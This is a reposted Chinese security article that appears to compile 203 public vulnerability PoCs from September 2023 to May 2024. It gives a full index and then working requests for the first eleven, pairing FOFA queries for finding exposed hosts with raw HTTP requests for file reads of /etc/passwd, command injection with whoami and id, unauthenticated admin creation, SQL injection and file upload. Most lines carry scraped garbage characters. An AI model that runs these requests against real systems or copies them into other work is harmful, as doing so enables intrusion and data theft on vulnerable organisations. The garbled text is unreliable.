互联网公开漏洞整理202309-202406
3 R4 v; n& M; \. Y3 o. U `! k道一安全 2024-06-05 07:41 北京. Q4 c( K4 y+ w
以下文章来源于网络安全新视界 ,作者网络安全新视界
( i% Q# H& R3 v ^0 \! n9 R+ l+ J+ @( I# l# @: W) ^
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。: i8 D7 B; v5 a+ F _( D
3 R4 U) \& l+ O4 V _漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
1 r4 S8 j C) Q, t- h3 p/ u3 y5 U* ?
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
4 P% W+ _ a/ {; n1 z
; W; I; s3 r" J- t; o文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。" T& u6 T! D6 l! r! `; _
, @% }# p7 N0 |& \$ l合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
+ p; f6 a9 _6 ]1 A
0 x1 F$ w4 b0 K; { y0 k" q; \# ^* t* |: R" K
声明5 v; w' n: L/ I; y B8 K! q) m
2 L/ N" ` N# |' L
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。$ a* p4 r" o* h3 I+ [3 W6 Y% @/ x: h
% F E7 M- v2 ?( l3 |
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。3 c$ Z& G% ~" b+ k W/ Y* Q7 ]
8 Q: p' C% ^4 L" B1 f- `0 g8 A& F" Q0 _# p: X' Y/ y
7 W) u) W9 A' i6 i$ k
目录
n/ s) p! E: x9 L a; r
1 V7 U9 {- C( g9 k# U0 o9 f01# I2 j! u- Z2 m6 l. j5 M
7 U% u3 |/ n! {- {+ H z5 H* h3 Y
1. StarRocks MPP数据库未授权访问
% A4 N$ g9 p2 f% I* v: ?6 R+ W3 T2. Casdoor系统static任意文件读取3 L6 N& Y6 o" T. I+ P
3. EasyCVR智能边缘网关 userlist 信息泄漏5 p& c$ S' S- n/ J0 G
4. EasyCVR视频管理平台存在任意用户添加. q j4 ` v9 P' X
5. NUUO NVR 视频存储管理设备远程命令执行4 ]; E' _- J% y; U% R% o' x$ F& I R
6. 深信服 NGAF 任意文件读取
# U0 L/ `% H# u& A* u7. 鸿运主动安全监控云平台任意文件下载
& u @% y' ^* j% R9 H8 G! t4 q8. 斐讯 Phicomm 路由器RCE
) \4 W* _* C* O7 C+ R r% z9. 稻壳CMS keyword 未授权SQL注入
& @2 N" U& E' R10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
/ i( ?8 y, t" v; y3 T11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入) e- A. p% r: }! k7 _, L
12. Jorani < 1.0.2 远程命令执行
0 X2 \* ~+ W2 ~; N13. 红帆iOffice ioFileDown任意文件读取3 }# W$ K6 R' S
14. 华夏ERP(jshERP)敏感信息泄露
- {4 n# n! F U$ j1 x: [15. 华夏ERP getAllList信息泄露
8 I. z* |5 N- r8 Y8 u4 L16. 红帆HFOffice医微云SQL注入
; l# ?7 ~; R7 a. T* w17. 大华 DSS itcBulletin SQL 注入6 Z& w5 p+ Q5 y: |1 f& f
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露. W9 X7 f" i4 O' `. g) l
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入1 q+ V2 Z( k2 [/ I
20. 大华ICC智能物联综合管理平台任意文件读取* |# y s8 f b$ L
21. 大华ICC智能物联综合管理平台random远程代码执行
t! s7 ~ R, @ T( {1 G R8 p22. 大华ICC智能物联综合管理平台 log4j远程代码执行- b+ X( O4 `% ?# x6 t# _1 }& F9 l6 l0 h
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
0 [/ E( b* l0 [5 L9 M0 N3 j7 |24. 用友NC 6.5 accept.jsp任意文件上传
, h) n, {& L, ~25. 用友NC registerServlet JNDI 远程代码执行# Z4 m# A E* x6 ]; o- n
26. 用友NC linkVoucher SQL注入
) z' o: j* t8 R& y. s1 {6 N: [' n27. 用友 NC showcontent SQL注入' \# U+ N0 G) `) M
28. 用友NC grouptemplet 任意文件上传
9 R5 ^' y/ ]- ~: ?29. 用友NC down/bill SQL注入9 U" H/ q1 f9 Y# A# B. |: H
30. 用友NC importPml SQL注入& Z2 Y" l% l5 c% L* t, u
31. 用友NC runStateServlet SQL注入
% y5 j' A1 D6 I. H) ?9 A32. 用友NC complainbilldetail SQL注入+ ? ~. M/ A% x/ C" F
33. 用友NC downTax/download SQL注入$ A: g4 E& ?5 h
34. 用友NC warningDetailInfo接口SQL注入
& o0 d; A$ R: l( l3 \35. 用友NC-Cloud importhttpscer任意文件上传
; M0 h/ \ Y3 N* i& I36. 用友NC-Cloud soapFormat XXE( t2 M. [ n9 u: ?9 S. K
37. 用友NC-Cloud IUpdateService XXE7 k4 @) j% |( J: Q* @
38. 用友U8 Cloud smartweb2.RPC.d XXE
- R, D8 i. l8 W& N! j2 r, C3 v39. 用友U8 Cloud RegisterServlet SQL注入
! d$ w, A; r7 M" p- k: c40. 用友U8-Cloud XChangeServlet XXE
" L0 r. Q% S" K2 ?+ n41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 H8 d; k# H6 \* x1 A+ ]# g42. 用友GRP-U8 SmartUpload01 文件上传
: t9 l) o1 d$ k: M43. 用友GRP-U8 userInfoWeb SQL注入致RCE
8 T( [2 s1 Z) R3 u" s/ y; ]44. 用友GRP-U8 bx_dj_check.jsp SQL注入
% U% d+ x: S# a$ S45. 用友GRP-U8 ufgovbank XXE" [" _" c& |0 |3 _
46. 用友GRP-U8 sqcxIndex.jsp SQL注入3 H5 v, M% ~5 ?2 F: k- D2 F2 Y' g N
47. 用友GRP A++Cloud 政府财务云 任意文件读取& h. I" r2 J: N" ^- i& ? O
48. 用友U8 CRM swfupload 任意文件上传9 T$ f: Y m# C2 @$ J5 y+ L5 s' Y
49. 用友U8 CRM系统uploadfile.php接口任意文件上传4 B7 D) U2 t0 D2 l. V' n
50. QDocs Smart School 6.4.1 filterRecords SQL注入
4 V/ v9 Y. H2 r. D0 ]51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
$ g1 E% K* t' p# ?+ A$ R52. 泛微E-Office json_common.php sql注入) O4 r: J& X( }
53. 迪普 DPTech VPN Service 任意文件上传
# H# b8 ^1 N" c$ a+ W54. 畅捷通T+ getstorewarehousebystore 远程代码执行 s6 k+ o; L" Y' h+ q: r) q
55. 畅捷通T+ getdecallusers信息泄露
6 u! N$ N, a5 G9 H56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE! m/ e# x# |' x- O/ c8 g: H
57. 畅捷通T+ keyEdit.aspx SQL注入
2 e" l! {7 n: ^3 V" ]58. 畅捷通T+ KeyInfoList.aspx sql注入/ D: j& W4 _% e/ }/ i
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行; g4 {8 X5 v2 h& R4 \$ \% j' G2 N
60. 百卓Smart管理平台 importexport.php SQL注入
3 i& c0 [, v# N& }' U; H& m6 C( Q( j61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
7 I) m6 z1 q6 \) ~: h$ E62. IP-guard WebServer 远程命令执行* @4 t4 S2 M( K6 q8 k$ ^# K) b ^
63. IP-guard WebServer任意文件读取, h8 o5 a1 q$ K3 r1 c: `$ k# l T
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
) ~/ B0 f6 X8 L1 @! X65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
9 o, A2 j/ G1 ~* \* o# H66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
: E# i3 m& d' B5 J0 O8 y67. 万户ezOFFICE wpsservlet任意文件上传
! @) y2 `& W- U% q% E; g68. 万户ezOFFICE wf_printnum.jsp SQL注入/ A& t4 b0 O4 |5 V
69. 万户 ezOFFICE contract_gd.jsp SQL注入3 b* M: ]/ z, @+ f* Z+ _
70. 万户ezEIP success 命令执行4 C: d; C: r& W0 }
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
, h3 D: O7 ]- H7 A$ q5 g72. 致远OA getAjaxDataServlet XXE
4 W/ `. x( l4 _5 @73. GeoServer wms远程代码执行
' U; d6 ~. T6 \* C- j" T( W0 z$ ~/ s74. 致远M3-server 6_1sp1 反序列化RCE7 r+ z% i$ I' o3 ~
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE, p1 x* i( b0 s9 n
76. 新开普掌上校园服务管理平台service.action远程命令执行, q2 Z: |2 e- c
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
8 P! D! [ r. a6 [78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
# S% {7 b+ _2 G) |# a8 B% k79. BYTEVALUE 百为流控路由器远程命令执行9 u3 u, B8 a5 O
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
5 @2 c8 m! N( ?: ^( ~# m81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
9 v2 }, O+ h& r! `0 z82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
* ~$ Q4 I n$ v9 R' S) e83. JeecgBoot testConnection 远程命令执行0 J7 h. t) E1 l: O0 n6 n
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入1 ?' W2 X" T7 i$ \% z% P
85. SysAid On-premise< 23.3.36远程代码执行
) q8 A% g& ]4 V' s5 U, a86. 日本tosei自助洗衣机RCE4 K2 o' p8 P* u& g) q+ y
87. 安恒明御安全网关aaa_local_web_preview文件上传
! c* R$ r$ j6 _/ h$ x7 w88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
! Q" [' b& J' b0 g89. 致远互联FE协作办公平台editflow_manager存在sql注入
C4 e" x1 A. C! _2 \9 V1 O90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行! Z5 [- n! ^0 W, X) W* x
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
. d" P! v( m0 W. o0 Y. e92. 海康威视运行管理中心session命令执行5 _7 g8 E2 e- x; l. Z/ r
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传% G j0 Z% `8 D
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
' C8 f1 q+ x, q95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行$ {* m2 ^% \8 S! w' I K
96. Apache OFBiz 18.12.11 groovy 远程代码执行
- [* s, w. p3 w1 J97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
: T; G s3 ~. H4 H% v5 d98. SpiderFlow爬虫平台远程命令执行/ |* b6 X8 O8 F
99. Ncast盈可视高清智能录播系统busiFacade RCE
B# |/ l) B3 Q' N* x# ~- h) M9 k100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
( q3 D; G9 F- p, j101. ivanti policy secure-22.6命令注入
% M9 q" e3 {+ b% a V Q102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行1 t( V; k6 I3 P5 e: D
103. Ivanti Pulse Connect Secure VPN XXE5 p! n2 j7 j$ S, W# }
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露3 H, T0 j' [8 @5 A6 W6 R) {$ n
105. SpringBlade v3.2.0 export-user SQL 注入# H# H; }. x" R7 K x$ A* r: V
106. SpringBlade dict-biz/list SQL 注入+ d2 S2 u" H. B R& A8 \
107. SpringBlade tenant/list SQL 注入( d( o+ n6 @+ e3 v+ `
108. D-Tale 3.9.0 SSRF
! |: }/ w J9 L& s109. Jenkins CLI 任意文件读取
( g4 |( b! p! N5 l# o( c110. Goanywhere MFT 未授权创建管理员
: @/ x( r) o q$ |111. WordPress Plugin HTML5 Video Player SQL注入
8 Z- N& I+ ?! d. b3 G112. WordPress Plugin NotificationX SQL 注入& X7 Z8 S: f, D0 e% j3 o
113. WordPress Automatic 插件任意文件下载和SSRF
) l% f, X: b$ \4 G6 e; A114. WordPress MasterStudy LMS插件 SQL注入& O9 q$ A/ v4 i+ g
115. WordPress Bricks Builder <= 1.9.6 RCE
& R8 b: U: k( B, p& g116. wordpress js-support-ticket文件上传
`. k5 G9 }( \1 C* u1 @117. WordPress LayerSlider插件SQL注入
8 k/ t1 P) S+ a% `% }118. 北京百绰智能S210管理平台uploadfile.php任意文件上传. u, L" {9 {; L9 p+ H E& X4 s
119. 北京百绰智能S20后台sysmanageajax.php sql注入
; W- T( Z2 |' l5 B: v- y120. 北京百绰智能S40管理平台导入web.php任意文件上传
& K/ \0 v5 M0 @6 j121. 北京百绰智能S42管理平台userattestation.php任意文件上传
' U- O& H8 D; T# `4 x8 l122. 北京百绰智能s200管理平台/importexport.php sql注入
^7 q( s4 o. \. g. n# t, z/ A$ z123. Atlassian Confluence 模板注入代码执行
9 E% W a5 u& ?0 ?2 \9 F% |124. 湖南建研工程质量检测系统任意文件上传6 b4 r. [. {. G" X
125. ConnectWise ScreenConnect身份验证绕过9 P3 k% K% ?5 h0 ?8 l
126. Aiohttp 路径遍历' e1 x2 P* j& M3 E1 P
127. 广联达Linkworks DataExchange.ashx XXE
6 ~4 u) }5 d( O! p$ a$ Q' I, m5 z5 n128. Adobe ColdFusion 反序列化
2 |" W' b# u5 U0 ?( e- ^7 }129. Adobe ColdFusion 任意文件读取
; i8 m7 k! L$ Z9 o" {" f130. Laykefu客服系统任意文件上传
4 t7 p+ d% H( A' T. N9 A1 w) u131. Mini-Tmall <=20231017 SQL注入
3 s% v* p0 n3 L( b; A132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
& T- l8 V& y; j. B133. H5 云商城 file.php 文件上传
7 C# n9 J, d6 B7 F9 I7 r- t134. 网康NS-ASG应用安全网关index.php sql注入+ Q$ ]9 ]2 y; k; s4 w9 r% n7 v
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( u" ]' l9 m6 }2 i9 Y$ q
136. NextChat cors SSRF7 R3 J4 y) ?9 F/ Y; Y6 @/ O
137. 福建科立迅通信指挥调度平台down_file.php sql注入9 I) ]) ]5 o3 G, U" o' i9 i/ W# x9 z
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入5 Z+ i8 ] j: K6 E
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
+ G P5 l/ d, r. X* y140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入! D( N. ]3 l; I* S/ J
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
) u4 {+ \ u1 n0 [. @142. CMSV6车辆监控平台系统中存在弱密码
& u1 p( T V, ^+ M6 W143. Netis WF2780 v2.1.40144 远程命令执行+ `9 @( n2 ]8 c% q( Z6 g7 z; e
144. D-Link nas_sharing.cgi 命令注入
- {& |; G. t" p4 G5 Z5 U145. Palo Alto Networks PAN-OS GlobalProtect 命令注入/ N% |# ^1 v: t. \* S
146. MajorDoMo thumb.php 未授权远程代码执行( E- F! L1 y+ n v2 f6 v
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
( J* p: ~2 @! z+ l! H148. CrushFTP 认证绕过模板注入
: d% }, C$ `* B) X, o6 H149. AJ-Report开源数据大屏存在远程命令执行
7 O- z, o. }, {! b" ]3 f150. AJ-Report 1.4.0 认证绕过与远程代码执行- j! z, n" f" ~- W* c
151. AJ-Report 1.4.1 pageList sql注入
# a. U3 T1 L3 H5 ^# v4 s' O152. Progress Kemp LoadMaster 远程命令执行
/ B+ s7 @# ?; y6 i5 w$ J$ e153. gradio任意文件读取1 i5 ^. T5 Y; x
154. 天维尔消防救援作战调度平台 SQL注入
8 V. w. _8 [! h1 q/ J9 P6 k155. 六零导航页 file.php 任意文件上传+ R4 I0 X, [0 `* \6 Q% K3 q3 f
156. TBK DVR-4104/DVR-4216 操作系统命令注入
1 ]$ Q0 N" D5 r4 ^/ j7 p3 g157. 美特CRM upload.jsp 任意文件上传( ?# _/ Y( y2 B4 K; ^! \4 C1 a
158. Mura-CMS-processAsyncObject存在SQL注入" _& p+ f# j) s$ N
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
5 t) ?3 V2 ~+ Q/ U+ l) ^$ v1 `160. Sonatype Nexus Repository 3目录遍历与文件读取8 T. R! P* W1 l6 [
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
8 ?/ p }' S6 k6 P# O% L162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
7 H ~5 y5 B, y8 v% L7 K163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
1 U' N1 }2 `/ X3 b" t( H) F164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
+ m+ Q; t- |. C! m- T165. OrangeHRM 3.3.3 SQL 注入
4 r1 r& [$ A8 N166. 中成科信票务管理平台SeatMapHandler SQL注入& p" H5 ^( j9 M0 y5 }/ g, T' u
167. 精益价值管理系统 DownLoad.aspx任意文件读取4 q! f, ^; p0 d7 c' p
168. 宏景EHR OutputCode 任意文件读取
+ f. r7 ^' x1 f% P9 s% F169. 宏景EHR downlawbase SQL注入
9 N& ?8 t+ {6 c; Q) \170. 宏景EHR DisplayExcelCustomReport 任意文件读取
; j! Z: F% _; ^8 a9 D. K171. 通天星CMSV6车载定位监控平台 SQL注入& F8 q) P6 R7 q( p3 w6 \7 Y
172. DT-高清车牌识别摄像机任意文件读取
6 _& U. |* I- f! s# j173. Check Point 安全网关任意文件读取
6 m" _$ m. \ c' A& X174. 金和OA C6 FileDownLoad.aspx 任意文件读取) j# w# r$ D3 j+ B5 `
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入- N7 [! S, M, S+ u. S( o
176. 电信网关配置管理系统 rewrite.php 文件上传( E3 I/ L$ `6 p
177. H3C路由器敏感信息泄露' r8 F3 g4 u/ D: I% `. X2 ~
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
) Y) T' z" T7 r/ [3 u179. 建文工程管理系统存在任意文件读取! |! K+ a& u# g
180. 帮管客 CRM jiliyu SQL注入
& o* |. H1 l2 C8 Z% ^2 v- j$ e9 |181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
9 c2 s8 H" p2 b182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建/ u1 h3 w7 q) _, R
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入5 n8 F! x( j- _% r+ Y5 p
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
# f4 _: q) H* ^! ?6 D185. 瑞友天翼应用虚拟化系统SQL注入. l; M4 L( [# e' z0 K+ o: a
186. F-logic DataCube3 SQL注入; e+ V1 k- i7 C
187. Mura CMS processAsyncObject SQL注入
{+ R' ^) E+ B6 T0 m. i188. 叁体-佳会视频会议 attachment 任意文件读取
; z U! x" w' ?# y189. 蓝网科技临床浏览系统 deleteStudy SQL注入
- T% F0 M: @/ H4 N190. 短视频矩阵营销系统 poihuoqu 任意文件读取
, x, ^; B& @) _) C5 U191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入' O8 h p0 J) Y% x" c
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传0 Y& u1 z+ |2 ~. Q( ~, X7 S
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
% C/ ]6 C/ m( s* L' I3 `194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传0 I1 @, X9 p) }, h( ?0 M
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
1 X. x) J v" [0 `196. 河南省风速科技统一认证平台密码重置
2 n' I% b6 t& S& O; I. G! b197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
9 N! r! A A( e4 R0 A/ E8 {198. 阿里云盘 WebDAV 命令注入
- N* T7 d4 T' K! i% c9 v, m199. cockpit系统assetsmanager_upload接口 文件上传
0 I8 _- S9 A" k! G/ U* x200. SeaCMS海洋影视管理系统dmku SQL注入
( C4 y5 T% R) d( W$ p( t: ?" f201. 方正全媒体新闻采编系统 binary SQL注入$ D0 p( v: q$ f" ^' Z% z* m
202. 微擎系统 AccountEdit任意文件上传) _7 t3 C( K: m
203. 红海云EHR PtFjk 文件上传' m# y, d2 R+ k5 M3 O: l
/ F2 Z1 R/ |% L( U' K8 i$ F7 x
POC列表: |! u9 [0 M2 K1 Y3 F- i; h
/ @9 [4 @1 A9 D02
& H& n4 f5 @' r. i& y4 ]1 g4 f0 P( C a4 z! L& z/ v) h E8 R q
1. StarRocks MPP数据库未授权访问
/ r" }0 W( z1 g/ {" u# mFOFA :title="StarRocks". J9 [/ H6 n( `6 |" ?! _
GET /mem_tracker HTTP/1.1' R0 t# P1 A( C
Host: URL, B- T# H; l5 v9 {
+ c' ^- Z& j1 ^ v
: A3 W; `8 B2 e: }# D. J ^4 \2. Casdoor系统static任意文件读取% R/ M) f/ K) S9 N4 f7 }
FOFA :title="Casdoor"' L2 u; s% u! y% k. ]
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1! s' `( ^ b/ P& z5 n: l
Host: xx.xx.xx.xx:9999
& |& C* f: X0 p! }* Y4 eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ G2 v6 e$ v/ @1 CConnection: close
h1 h$ Y3 H# h: j* S7 e: `' } kAccept: */*
# J0 O9 X$ E; j, ^) pAccept-Language: en
& x8 @ E* J) N- J( d: tAccept-Encoding: gzip8 x- V( B& G& _: b( a% V3 G |& C
7 c6 p& H/ r- e* e, s1 V, R/ D/ X
# s" W9 ^. N0 f% j3. EasyCVR智能边缘网关 userlist 信息泄漏& E y2 j" r: U1 f
FOFA :title="EasyCVR"2 X6 Y- ^% q' ~( H. `
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
) f- j$ W$ }2 nHost: xx.xx.xx.xx2 }' d; Y) n$ ~; F" ?- f' o' b) @
# w7 S2 ]9 Z0 R" s7 _8 }4 M
" r# @. }$ \7 p# Z/ ?4. EasyCVR视频管理平台存在任意用户添加2 e y/ [, n1 ^6 ^9 H
FOFA :title="EasyCVR"
# U7 X1 |6 `0 P3 L; E5 B
0 G! c2 r1 V$ [1 gpassword更改为自己的密码md5 X# K, h" M( ^# }. i
POST /api/v1/adduser HTTP/1.1; P/ d2 j3 g. x0 E. J
Host: your-ip9 u% d$ {, F6 X! D- G2 H
Content-Type: application/x-www-form-urlencoded; charset=UTF-86 U' d5 A \( o8 q5 ]: ]
* V5 a; D% b `& fname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=14 k3 s6 r. w" L/ i. d
4 f( a! p! N2 g. C. s N: Y/ F& _* D
5. NUUO NVR 视频存储管理设备远程命令执行
1 P7 o7 [- U& F) O# ]FOFA:title="Network Video Recorder Login"
0 l( r6 t6 u, j2 e7 JGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
, [+ ~$ R: ]( j) M7 UHost: xx.xx.xx.xx
* |0 U: I$ z8 @, a5 V+ L' z# f" q7 d/ l+ \5 ]3 a n
+ O& \1 L3 W9 l! F6. 深信服 NGAF 任意文件读取
* J: O& B4 b1 `& U& [1 u wFOFA:title="SANGFOR | NGAF"6 N6 [. ?5 U& h: o5 \/ }
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1' O$ e. x; v* ]; r7 U, O8 V' ]7 L
Host:
+ H+ Q& G0 S+ b2 q
& [; N! E8 t( Z6 C# _: c5 K: j
8 S( {0 t3 d* v* I3 N' |% ?6 f7. 鸿运主动安全监控云平台任意文件下载
0 U ?. N9 w: h; MFOFA:body="./open/webApi.html"
- K, K8 N3 g3 lGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
* r( m7 q, a' W8 {' V' Q* Z3 xHost:' |6 X9 ~" U, T8 u
0 v; s2 O4 L2 x& |( w* T. E% z2 `: o2 b& m5 Y
8. 斐讯 Phicomm 路由器RCE
" r+ \2 g0 Q$ p! F( K! }5 |6 w$ RFOFA:icon_hash="-1344736688"' K: K C8 v0 Y' y) [7 ^ `( q
默认账号admin登录后台后,执行操作1 h7 a% ^/ n! a9 t, M
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
8 c' @- |! S3 F, tHost: x.x.x.x! L3 @7 ?' E9 l7 |, E: E4 |( u
Cookie: sysauth=第一步登录获取的cookie
5 m7 R/ T" T n$ Q. nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz, V$ B) k! L9 \( h4 t
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 Y) ?6 S8 q: \, O) `: B% T+ q
, @9 r! T1 n: s" S" r
------WebKitFormBoundaryxbgjoytz, t5 d( ^, _6 a! A8 z
Content-Disposition: form-data; name="wifiRebootEnablestatus"
' I) T$ ^, q$ i8 ]. K9 m' a
\, \2 X6 w- p: v) \7 R%s
$ \; k0 M* F R, U1 l------WebKitFormBoundaryxbgjoytz
( @ x- L( e P& ~ t' Q( t, Y% TContent-Disposition: form-data; name="wifiRebootrange"
. u- v7 }9 `2 U5 f( x+ j5 B" s7 l8 u6 G2 K. s. p
12:00; id;2 ~# \# k, ]& s7 q* R! I
------WebKitFormBoundaryxbgjoytz
) ?, D1 M2 N9 N( ]% k' gContent-Disposition: form-data; name="wifiRebootendrange"1 n, W& \0 Y- Z i8 t
" b, \, y% x: \) Z
%s:
# E: e3 x& G/ ], z9 v% Z& t5 o* X------WebKitFormBoundaryxbgjoytz
^) \7 s+ `3 }" @3 m; H& wContent-Disposition: form-data; name="cururl2"
( V, Z9 u* C+ {( y( u/ E @! T& p- p3 ~* u* d
& p8 l4 {5 X, |9 b------WebKitFormBoundaryxbgjoytz--
. m1 j7 y/ B4 ^9 I$ d% |' r
( I' |7 _9 n1 |- r) O" S$ U$ U; @$ c- S( j
9. 稻壳CMS keyword 未授权SQL注入
$ _9 S/ J% _% o% J; S1 o1 OFOFA:app="Doccms"" X! l: W- e' \/ Q) x( N# m
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.10 x/ S: N2 }/ U; D" l, p: s) O
Host: x.x.x.x
- S% f4 z' Q. m# {# I# @* @3 D! C
( \# F/ @+ p5 h
payload为下列语句的二次Url编码
. q/ W/ D; y) ^) j
. {6 X0 |! t9 v2 o$ y' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
1 x; x7 ], u! Q( z0 b9 w( n) ]6 J
3 e+ D! h* O/ a/ `1 ^+ {5 D* h10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' N- ], Z, k9 t9 U2 P
FOFA:icon_hash="953405444"
# z7 c8 ]" B( {$ k0 A) |4 {5 b
/ k f- {% ~% j文件上传后响应中包含上传文件的路径
: ?" w% i# H5 yPOST /eis/service/api.aspx?action=saveImg HTTP/1.13 f9 p3 F% |/ R8 B% c' l
Host: x.x.x.x:xx7 A# Z9 A6 S1 v& ]( l( o, C( s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
$ m1 Z3 ]" P, ]$ oContent-Length: 197
/ y" y8 }( c# w. }5 ]( bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 H* X+ c5 Z% o% r
Accept-Encoding: gzip, deflate1 h% c5 t4 U p5 l( \* G! d! ?
Accept-Language: zh-CN,zh;q=0.97 Q& N3 ^3 Q, v2 H0 J/ R4 b, i
Connection: close
; x/ g0 K: |5 {' ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
9 Q% V% k L: M5 N, Q( L
7 C- w0 {7 e/ b) ~+ z2 s4 n- a------WebKitFormBoundaryxdgaqmqu; y! n7 e) m6 w: c3 _8 Z" X
Content-Disposition: form-data; name="file"filename="icfitnya.txt" D+ k( C9 x5 w$ g: D
Content-Type: text/html5 a ~9 w8 ]' v6 `8 b5 @
$ {, k# V1 ]. V+ I# L1 f% \3 Ujmnqjfdsupxgfidopeixbgsxbf
5 ?, E3 v5 G6 x9 Y- _) R' @------WebKitFormBoundaryxdgaqmqu--
" w& L/ Q; g N+ Z% V1 n0 {( w2 W, a) I$ i: V
. k: h5 u; p i/ b |9 B11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入6 }3 Q; a$ K1 {+ R1 f( @
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
5 t- Q2 A) X6 V- A3 tGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1( I: W% e& E' [! w/ m
Host: 127.0.0.18 U! h$ F$ d& X* ?# b0 U
